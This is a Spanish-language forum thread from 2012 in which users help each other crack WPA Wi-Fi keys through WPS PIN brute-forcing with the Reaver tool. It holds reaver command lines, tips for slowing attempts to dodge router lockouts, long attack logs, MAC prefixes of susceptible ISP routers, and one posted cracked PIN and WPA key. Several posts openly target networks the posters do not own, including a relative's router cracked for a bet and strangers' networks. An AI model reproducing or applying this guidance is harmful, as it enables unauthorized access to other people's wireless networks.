broadcom no es compatible con reaver.

Perdonar la ignorancia pero sí no fuesen compatibles qué llegué el conteo a esto:

 0.56% complete @ 2012-07-22 10:03:19 (265 seconds/pin)
Es posible??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 25 Julio 2012, 01:39 am
Perdonar la ignorancia pero sí no fuesen compatibles qué llegué el conteo a esto:

 0.56% complete @ 2012-07-22 10:03:19 (265 seconds/pin)
Es posible??

con que intensidad tienes al router (RSSI)? He encontrado que incluso a -60dbm no siempre es suficiente para un ataque confiable.  Depende del router y su entorno.

La compatibilidad no es si tiene o no modo monitor, sino que pueda que se saltee el pin y nunca va a terminal y se va a quedar en 99% por siempre.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 25 Julio 2012, 12:21 pm
Hola el router lo tengo -37 de potencia al lado y la marca es un shehzhen huawei y estoy haciendo pruebas con el por ahora voy por el 10 .86% pero me sale el mensaje ese que os mande anteriormente que va cambiando pin poco a poco pero tengo mi duda si conseguire el pin erroneo pero no la clave espero su respuesta salud


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sebas1980 en 26 Julio 2012, 06:38 am
Buenas amigos, enhorabuena por el foro, yo tengo una duda, ¿y si el essid a tratara no se llama ONOXXXX ó WLANXXXX porque se le ha cambiado el nombre y a la hora de poner los comandos tira un error?
Estoy intentando de mirar la mia, el essid es parecido a jgalincheuno(jgalincheuno).
Me dice que no acepta los parentesis, ¿hay alguna forma de arreglarlo sin cambiar mi essid?
Saludos compañeros.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 26 Julio 2012, 14:20 pm
Hola tengo un problema con una wlan_xxxx tecom que me sale error y esta bastante cerca una la saque y estaba mas lejos espero su respuesta


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 28 Julio 2012, 18:46 pm
Hola amigos e conseguido de internet un s.o linux que es el hermano de beini que se llama xiaopan y sirve para sacar las claves wpa/wpa2 con el wps. Es parecido al feedingbottle pero con la interfaz distinta. Voy a probarlo ahora y os cuento que tal es. Por cierto ya que a mi el wpscrackgui no me deja instalarlo me podriais decir el piin de las wlan_xxxx con mac C8:6C:87 wpa-psk Y jazztel_xx con mac ACE8:7B wpa2? salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 1 Agosto 2012, 21:54 pm
Parece ser que los de timofonica se han puesto duros y han sacado un muevo modelo de router , el asl-26555 y os puedo confirmar que es duro de pelar pues reaver llegando al 100% no da la clave, se queda tirando el último pin y no pasa adelante.....
Las macs empiezan por 8c:0c:a3:yy:xx:xx
siendo el essid wlan_xxxx con respecto a la MAC.
Tarda unas 17 horas y he realizado el ataque en días varios, sólo obteniendo como resultado parecido los 4 primeros dígitos del pin 2812xxxx.
Si alguien sabe algo, a ver si me ayuda que quiero ganarle una paella a mi cuñado ,pues el tio no me cuenta más de los datos indicados.
Un saludo.....
 


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 1 Agosto 2012, 23:03 pm
hola sapito123 has sacado tu la vodafone con esa 64:16:f0 te respondo a tu pregunta pero tu me respondes a la mia quiza ese modelo de telefonica no se ha vulnerable al ataque reaver si sabes el pin que lleva el router ese por defecto porlo aver que pasa por que hay gente que ha sacdo ese router con la misma mac segun la distancia de router tambien saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 2 Agosto 2012, 11:06 am
Lo siento GOolden, no he tenido la oportunidad de toparme con una vodafone con esa mac, pero creo que segun he leido, se bloquea a ciertos intentos, y hay que esperar a que reinicie de nuevo el ataque.....
Y en contestacion a tu respuesta, decirte que no es por la distancia, ya que mesaca unos -46 , que viene a ser una senñal del 54, e inyecta bien los pines, cada 16 segudos.. pero nada de nada.. llega el reaver al 99.9% y se queda tirando el ultimo pin todo el rato.... mas lo deje 2 horas mas y nada...
Realmente un router duro de pelar....
Un saludo...

PD : si se bloquea a ciento tiempo, pon el comando que hace que tire los pines a los segundos que tu pongas ...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 2 Agosto 2012, 18:31 pm
Parece ser que los de timofonica se han puesto duros y han sacado un muevo modelo de router , el asl-26555 y os puedo confirmar que es duro de pelar pues reaver llegando al 100% no da la clave, se queda tirando el último pin y no pasa adelante.....
Las macs empiezan por 8c:0c:a3:yy:xx:xx
siendo el essid wlan_xxxx con respecto a la MAC.
Tarda unas 17 horas y he realizado el ataque en días varios, sólo obteniendo como resultado parecido los 4 primeros dígitos del pin 2812xxxx.
Si alguien sabe algo, a ver si me ayuda que quiero ganarle una paella a mi cuñado ,pues el tio no me cuenta más de los datos indicados.
Un saludo.....
 

igual pueda q tambien esten mal los primeros cuatro, ya que si llego a 100% y no dip el pin, es que el router q atacas o tardo en responder.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 2 Agosto 2012, 23:36 pm
sapito123 gracias `por tu respuesta pero asi es ese router de telefonica es muy duro de pelar y por lo que he leido con esa red todo el mundo tiene problemas que cuando llega al 99 no da ni la clave ni el pin por cierto donde has leido eso de esa vodafone saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 3 Agosto 2012, 09:24 am
Con permiso de los moderadores, pongo enste enlace de una pagina amiga donde hay una informacion muy interesante :

http://lampiweb.com/foro/index.php/topic,8188.0.html

Y otra preguntilla, a ver si alguien me lasabe resolver ... Se el primero digito del pin pero no los 7 restantes.. ¿ como seria el comando a seguir para que empieze a chequear desde esa primera cifra y el resto lo haga de forma automatica uno por uno ?
Gracias... y un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 3 Agosto 2012, 18:28 pm
Y otra preguntilla, a ver si alguien me lasabe resolver ... Se el primero digito del pin pero no los 7 restantes.. ¿ como seria el comando a seguir para que empieze a chequear desde esa primera cifra y el resto lo haga de forma automatica uno por uno ?
Gracias... y un saludo

no puedes, unicamente puedes usar el comando -pin si es q tienes los primeros 4 digitos. en tu caso deberias generar un diccionario personalizado.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 4 Agosto 2012, 21:36 pm
Hola con esta red de vodafone 64:16:f0 que llevo tiempo haber si tengo una respuesta me envia m2d y va cambiando y cuando lleva un rato se bloquea y lo tengo que reiniciar la pregunta es con tanto bloqueo me dara la clave con el pin saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: FeR!__ en 5 Agosto 2012, 22:27 pm
Parece ser que los de timofonica se han puesto duros y han sacado un muevo modelo de router , el asl-26555 y os puedo confirmar que es duro de pelar pues reaver llegando al 100% no da la clave, se queda tirando el último pin y no pasa adelante.....
Las macs empiezan por 8c:0c:a3:yy:xx:xx
siendo el essid wlan_xxxx con respecto a la MAC.
Tarda unas 17 horas y he realizado el ataque en días varios, sólo obteniendo como resultado parecido los 4 primeros dígitos del pin 2812xxxx.
Si alguien sabe algo, a ver si me ayuda que quiero ganarle una paella a mi cuñado ,pues el tio no me cuenta más de los datos indicados.
Un saludo.....
 
Estoy igual, me tarda como un día y medio y se queda en el 99.99% probando el mismo PIN. Va a tocar esperar, por lo pronto yo lo voy a volver a dejar a ver qué saca estos días.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 5 Agosto 2012, 23:57 pm
Hola con esta red de vodafone 64:16:f0 que llevo tiempo haber si tengo una respuesta me envia m2d y va cambiando y cuando lleva un rato se bloquea y lo tengo que reiniciar la pregunta es con tanto bloqueo me dara la clave con el pin saludos

Algo así:

Código:
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[!] WPS transaction failed, re-trying last pin
[+] Trying pin 01255676
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 193 seconds
[+] WPS PIN: '01255676'
[+] Nothing done, nothing to save.

Principalmente el dispositivo no es compatible o esta funcionando mal; ya que esto me ha pasado con mi Alfa Network AWUS036H de 1W que ya tiene unos 5 años de uso apleno. Ya ni siquiera inyecta ni menos atacar por WPS (Ojo que por Reaver-PRO (http://foro.elhacker.net/wireless_en_linux/reaver_pro_reaverwps_pro_edition_live_dvd-t368097.0.html) si funciona).. en cambio ahora agarro una TP-Link TL-WN722N y corre perfectamente con AR7291...

Luego también pueda que el hardware del router sea muy malo, tenga poca memoria (cache) o procesamiento. En algunos casos, cuando la asociación se produce en el conteo de la AP, este se reinicia. En tu caso, creo que tendrás que ser paciente. Poco a poco lo consigues... yo he tardado 30 días para poder crackear un router y lo logre.. así que no esperen que en 4 horitas puedan hacerlo.. todo dependerá si el router se deja crackear o no.... tengo otro hace 90 días crackeando.. solamente puedo probar 10 pines cada 2 días...



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 6 Agosto 2012, 11:20 am
si muchas gracias por tu respuestas por cierto que router utilizas tu que se bloquean tanto tambien saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 6 Agosto 2012, 17:48 pm

P4nd3m0n1um pero con tanto bloqueo seguro que lo consegire te voy a enviar el fabricante del router haber si lo conoces shehzhen huawei comunication ese es haber si te haces una idea por cierto en la foto esa no consigues nada no saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: FeR!__ en 6 Agosto 2012, 19:26 pm
Estoy igual, me tarda como un día y medio y se queda en el 99.99% probando el mismo PIN. Va a tocar esperar, por lo pronto yo lo voy a volver a dejar a ver qué saca estos días.
Bueno me cito para decir que está probando el pin 7329XXXX ahora a esperar a que llegue al 99.99% y me cague en su **** *****


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: davidyceci en 8 Agosto 2012, 03:01 am
bueno primero agradecer a todos los aportantes de informacion  y  a P4nd3m0n1um por el fantastico WPSCrackGUI.

primero voy a aportar mi granito de arena :

WPA conseguido a traves de wps:

MAC:00:21:91:xx:xx:xx
wps pin: 57111063
wpa psk: 1a2b3c4d5e


por otra parte me he topado con un router q se bloquea al llegar al 0.91 % mas o menos . en el caso de q se sature se podria enviar pines por decir cada 1 minuto para q no  se sature o el router igualmente lo hace de todas maneras?
el router es un TP-LINK con MAC 90:F6:52:xx:xx:xx

salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 8 Agosto 2012, 10:57 am
bueno primero agradecer a todos los aportantes de informacion  y  a P4nd3m0n1um por el fantastico WPSCrackGUI.

primero voy a aportar mi granito de arena :

WPA conseguido a traves de wps:

MAC:00:21:91:xx:xx:xx
wps pin: 57111063
wpa psk: 1a2b3c4d5e


por otra parte me he topado con un router q se bloquea al llegar al 0.91 % mas o menos . en el caso de q se sature se podria enviar pines por decir cada 1 minuto para q no  se sature o el router igualmente lo hace de todas maneras?
el router es un TP-LINK con MAC 90:F6:52:xx:xx:xx

salu2


Prueba con el pin 5727  para la tp-link


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 8 Agosto 2012, 11:14 am

Prueba con el pin 5727  para la tp-link


Normalmente se bloquean a x intentos, idependientemente del tiempo que se envien.
En algunos routers se ha probado inclusive cambiar la mac, pero con un resultado no satisfactorio.
Guarda sesiones cada vez que se bloque, y puedes tambien probar lo que comentas no solo con el tiempo de envio, sino con la cantidad de pines enviados.

Un saludo --


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 8 Agosto 2012, 16:33 pm
ya yo lo guardo pero mi duda que siempre cambia de pin con ese ataque que realiza de bloqueo y adesmas algunas veces me envia m6 por que no lo se y con md2 tambien tu crees que es buena señal de conseguir la clave y el pin esque tengo dudas voy por el 16% ahora mismo saludos espero la respuesta


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: davidyceci en 8 Agosto 2012, 19:13 pm
gracias por la respuesta y la aclaracion , intentare con el pin y con la manera q comentas , posteare resultados.

salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 8 Agosto 2012, 20:00 pm
ya yo lo guardo pero mi duda que siempre cambia de pin con ese ataque que realiza de bloqueo y adesmas algunas veces me envia m6 por que no lo se y con md2 tambien tu crees que es buena señal de conseguir la clave y el pin esque tengo dudas voy por el 16% ahora mismo saludos espero la respuesta

Llevar ya un 16% es todo un logro en los routers que se bloquean....
Sigue así que cuando te des cuenta ya lo tienes.
Lo importante es que reaver va chequeando y subiendo %, y aunque se bloquee y cambie el pin, es algo temporal ya que luego vuelve a la  de origen ., según tengo entendedido.
Un saludo y comentas....
Yo ahora estoy con una Onoxxxx , con MAC 5c: y se me bloquea al primer intento y más de 1 día dura el bloque..
esa si que no se como pillarla, pues debere entrarle suave con los envíos de pines...
Un saludo ....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 8 Agosto 2012, 20:34 pm
Mira sapito123 no es que se bloquee temporalmente esque cuando ya a tenido varios cambios de pin el router se bloquea y lo reinicio de nuevo sigue cambiando te lo enseñare
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK y asin va cambiando de pin tambien y mi duda es si siempre responde asin el router me dara la clave y el pin es una vodafone saludos espero tu respuesta.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: davidyceci en 8 Agosto 2012, 23:01 pm
GOolden
si si , te va a dar el pin igual aunque  mueestre mensajes de errores. al menos a mi me lo dio igual , yo he intentado lo q comentaban de antes iniciar aireplay-ng por ahi me tiraba menos errores al menos de asociacion.

salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 8 Agosto 2012, 23:37 pm
pero te dio la clave tambien david


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 9 Agosto 2012, 00:33 am
Mira sapito123 no es que se bloquee temporalmente esque cuando ya a tenido varios cambios de pin el router se bloquea y lo reinicio de nuevo sigue cambiando te lo enseñare
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK y asin va cambiando de pin tambien y mi duda es si siempre responde asin el router me dara la clave y el pin es una vodafone saludos espero tu respuesta.
Ese error es común y normal.... significa que el pin lanzado no es valido , bien porque no lo ha leído el router , o aveces porque se lanzan muy rápido y el router no lo puede leer, haciendo que reaver vuelva de nuevo a retomar el último pin que lanzó.
Si pones en el comando de ataque -vv al final, te tendría que salir el pin que lanza y las respuestas de m1,m2,m3 y m4 y además el % que lleva probado.
Si el % va en aumento, es que va adelante, pero si se queda siempre en el mismo pin es que algo malo está pasando.
Un saludo ...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 9 Agosto 2012, 00:40 am
sapito123 va aumentando pero siempre responde asin cambiando de pin y todo me envia m2d m2 y algunas veces m6 eso que quiere decir el pin va cambiando pero asin como he dicho anteriormente y mi duda es si me dara la clave asin con esos errores voy pro el 24% saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 9 Agosto 2012, 01:02 am
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
Sending identity response
Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
triying pin 324566437 este es mi error pero cambiando


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: davidyceci en 9 Agosto 2012, 02:15 am
te tira pin y wpa , quedate tranquilo , si sube el porcentaje te lo terminara tirando


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 9 Agosto 2012, 05:00 am
ya yo lo guardo pero mi duda que siempre cambia de pin con ese ataque que realiza de bloqueo y adesmas algunas veces me envia m6 por que no lo se y con md2 tambien tu crees que es buena señal de conseguir la clave y el pin esque tengo dudas voy por el 16% ahora mismo saludos espero la respuesta

se explico anteriormente q significado tenia cada m?.. el cual tiene q ver con la longitud de pin encontrado. m6 indica q tienes los primeros 7 caracteres de izq. a der.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: SokarTefnut en 9 Agosto 2012, 08:09 am
En mi antiguo ACER 5315 han pasado ya 3 horas, el reaver sigue intentandolo,
parece que todo va bien.

La tarjeta es una Atheros AR542x que viene incorporada en el portatil.

Objetivo:
WPA2 ONOxxxy    --  BSSID  2C:B0:5D:xx:xx:xx


  • 6.04% complete @ 2012-08-09 06:54:54 (13 seconds/pin)
  • Trying pin 06545673
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Sending WSC NACK
  • Trying pin 06555672









Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 9 Agosto 2012, 11:26 am
pero porque otra veces me envia m6 y otra veces no me lo envia y esos errores cada vez que va cambiando de pin y tengo que reiniciarlo cada que va  que se queda pillado saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 9 Agosto 2012, 11:58 am
pero porque otra veces me envia m6 y otra veces no me lo envia y esos errores cada vez que va cambiando de pin y tengo que reiniciarlo cada que va  que se queda pillado saludos

¿ Que antena usas? ¿ a que distancia estas de ap ( señal ) ?
Creo que tarda mucho en contestarte el ap y por eso los errores .
Hay una opcion de creo que es la -d time que le pones tu en " time " el tiempo que quieres que tarde en lanzar cada pin, pues reaver por defecto creo que lanza 1 pin cada diez segundos...
Que alguien lo corrabore que no me acuerdo bien..

Tambien esta la opcion -a , la cual hace que reaver actue el solo de la forma mas adecuada frente al ataque ...
Un saludo..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 9 Agosto 2012, 12:48 pm
es una alfa tipica y el router esta justamente abajo en mi salon y yo arriva pero esos vodafone se quedan pillados a ciertos intentos de pines y hay que reiniciarlo voy ya por el 27% pero no se si me dara la clave y el pin  correcto con esos errores y nesecito alguna opinion de alguien gracias sapito123 saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 9 Agosto 2012, 20:45 pm
Tú deja que valla sumando % que reaver se encargará de todo.
Hasta que no llegue al 94 % no da la clave,
y aún así aveces no la da.... es tener suerte, pero almenos necesitas un % alto .....
Un saludo ....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 10 Agosto 2012, 01:34 am
sapito tu has sacado la clave con esos errores voy el 32% pero el router se ha bloqueado temporalmente haber si ahi suerte de sacar la clave saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 10 Agosto 2012, 14:03 pm
hola no hay ninguna forma de evitar el bloqueo del router saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 10 Agosto 2012, 14:47 pm
Hola a todos,al final saque el WPS pin pero lo que no se es que hacer a continuacion,normalmente cuando sacas el pin mas abaJo  te indica la clave WPA tambien,pero en mi caso no es asi,entonces que hago con el pin?

gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 10 Agosto 2012, 16:50 pm
Hola a todos,al final saque el WPS pin pero lo que no se es que hacer a continuacion,normalmente cuando sacas el pin mas abaJo  te indica la clave WPA tambien,pero en mi caso no es asi,entonces que hago con el pin?

gracias.
Guardarse el pin y haz otro ataque de nuevo pero así
reaver -i mon0 -b MAC -p xxxxxxxx -vv
donde las x es el pin encontrado , a ver si así te lo saca .

Prueba con reaver 1.3 y si no el 1.4 , pero guarda ese pin , es importante.
Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 10 Agosto 2012, 17:10 pm
Guardarse el pin y haz otro ataque de nuevo pero así
reaver -i mon0 -b MAC -p xxxxxxxx -vv
donde las x es el pin encontrado , a ver si así te lo saca .

Prueba con reaver 1.3 y si no el 1.4 , pero guarda ese pin , es importante.
Un saludo.


Lo he intentado varias veces pero al final me muestra solamente el pin que encontre,no se que mas se puede hacer,lo he hecho con el reaver 1.4 por cierto.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 10 Agosto 2012, 18:08 pm
cyberking como se llama la red da mas datos saludos y la mac


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 10 Agosto 2012, 19:06 pm
cyberking como se llama la red da mas datos saludos y la mac


WLAN_FD5B

mac: 8C:0C:A3:22:**:**

Salu2 y gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 10 Agosto 2012, 22:19 pm
Ahh ya se cyberking con esa red todo el mundo tiene problemas no creo que la saque son lo nuevos router de movistar y son duros ten paciencia y prueba con otras redes saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 10 Agosto 2012, 22:59 pm

WLAN_FD5B

mac: 8C:0C:A3:22:**:**

Salu2 y gracias.

Por culpa de esa red  perdi una paella con mi cuñado .
Esa red se queda siempre al 99.9% y no saca ni el pin ni la clave.
El pin que te sale es como un bucle repetitivo, pues reaver no lo encuentra al tomar mal los 4 primeros .
Lei en un foro que el dueño de la red probó con su mismo pin correcto y no le dio la clave.
Para que de la clave tiene que salir la palabra 100% decripter, sino no hay nada
Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 10 Agosto 2012, 23:06 pm
El router de vodafone se ha bloqueado temporalmente y voy el 32% porque todavia no ha pasado al 90% saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alevele en 11 Agosto 2012, 00:28 am
Hola, pues a mi tambien se me ha quedado pillado en el 99,99 %
despues de unas 20 horas aproximadamente haciendo el ataque, me pasó del 30 % directamente asta el 90 % !! :huh:.
Llega asta el 99,99 %  y sigue generando el mismo pin constantemente una y otra vez.

WLAN_1C31
con mac:  8C:0C:A3:2X:XX:XX

99.96% complete @ 2012-08-10 22:24:03 (19 seconds/attempt)
  • Trying pin 68186708
  • Sending EAPOL START request
  • Sending identity response
  • Sending M2 message
  • Sending M4 message
  • Sending M6 message
  • Sending WSC NACK
  • Trying pin 68180287
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • Sending identity response
  • Sending M2 message
  • Sending M4 message
  • Sending M6 message
  • Sending WSC NACK
  • Trying pin 68182823
  • Sending EAPOL START request
  • Sending identity response
  • Sending M2 message
  • Sending M4 message
  • Sending M6 message
  • Sending WSC NACK
  • Trying pin 68182281
  • Sending EAPOL START request
  • Sending identity response
  • Sending M2 message
  • Sending M4 message
  • Sending M6 message
  • Sending WSC NACK
  • Trying pin 68182281
  • Sending EAPOL START request
  • Sending identity response
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • Sending WSC NACK
  • [!] WPS transaction failed, re-trying last pin
  • 99.99% complete @ 2012-08-10 22:25:42 (19 seconds/attempt)
  • Trying pin 68182281


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 11 Agosto 2012, 00:38 am
aleve con esa red todo el mundo tiene problemas y nadie la ha sacado son nuevos router de movistar que redes has sacado aleve saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alevele en 11 Agosto 2012, 00:51 am
Solo lo he intentado con esa, la mia.
y si es nuevo, me la puse hace 1 semana ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 11 Agosto 2012, 12:10 pm
Po eso quiere decir que tu router tiene seguridad hasta ahora ya que tienen wpa y wps reaver no funciona se quedan todos en 99% sin dar la clave asin que prueba con otras redes y ya me cuentas saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 11 Agosto 2012, 12:44 pm
El mensaje que tengo:

Key Cracked 100%
WPS PIN:513*****

El pin es corecto,luego hago:

reaver -i mon0 -b 8C:0C:A3:22:**:** -c 6 -e WLAN_FD5B --pin 513***** -vv

y a continuacion me sale el resultado mencionado mas arriba nada mas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 11 Agosto 2012, 15:26 pm
El mensaje que tengo:

Key Cracked 100%
WPS PIN:513*****

El pin es corecto,luego hago:

reaver -i mon0 -b 8C:0C:A3:22:**:** -c 6 -e WLAN_FD5B --pin 513***** -vv

y a continuacion me sale el resultado mencionado mas arriba nada mas.r
Estas redes tienen algo especial.... no se lo qué será pero son muuuuu chungas ....
No sueltan la clave ni a tiros....estas ya se me escapan de los pocos conocientos qué tengo .....
Yo, personalmente le volvería a pasar otra vez el reaver pero sólo poniendo los 4 dígitos del pin, a ver si hay suerte, y utilizando la versión 1.3 y la 1.4 por si acaso...
Un saludo y gracias por la información .....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 11 Agosto 2012, 15:32 pm
hola tengo un tp-link y se bloquea mucho por que se bloquea temporalmente algunos router


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 11 Agosto 2012, 16:26 pm
Estas redes tienen algo especial.... no se lo qué será pero son muuuuu chungas ....
No sueltan la clave ni a tiros....estas ya se me escapan de los pocos conocientos qué tengo .....
Yo, personalmente le volvería a pasar otra vez el reaver pero sólo poniendo los 4 dígitos del pin, a ver si hay suerte, y utilizando la versión 1.3 y la 1.4 por si acaso...
Un saludo y gracias por la información .....

Perdon pero como hago lo del reaver 1.3?Tengo aqui los logs de la ultima sesion:

Citar
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner


  • Waiting for beacon from 8C:0C:A3:22:**:**
  • Switching mon0 to channel 6
  • Associated with 8C:0C:A3:22:**:** (ESSID: WLAN_FD5B)
  • Trying pin 51326906
  • Sending EAPOL START request
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WPS transaction failed, re-trying last pin
  • Key cracked in 12 seconds
  • WPS PIN: '5132****'
  • Nothing done, nothing to save.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 11 Agosto 2012, 19:16 pm
El mensaje que tengo:

Key Cracked 100%
WPS PIN:513*****

El pin es corecto,luego hago:

reaver -i mon0 -b 8C:0C:A3:22:**:** -c 6 -e WLAN_FD5B --pin 513***** -vv

y a continuacion me sale el resultado mencionado mas arriba nada mas.

no tenes que especificarle mucho a reaver porque se cuelga dependiendo del adaptador.. yo por lo general mando -b y -p solamente.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 12 Agosto 2012, 15:28 pm
Las wlan_xxxx  con MAC 8c:0c:a3  tiene 20 caracteres alfanuméricos ( números y letras ).
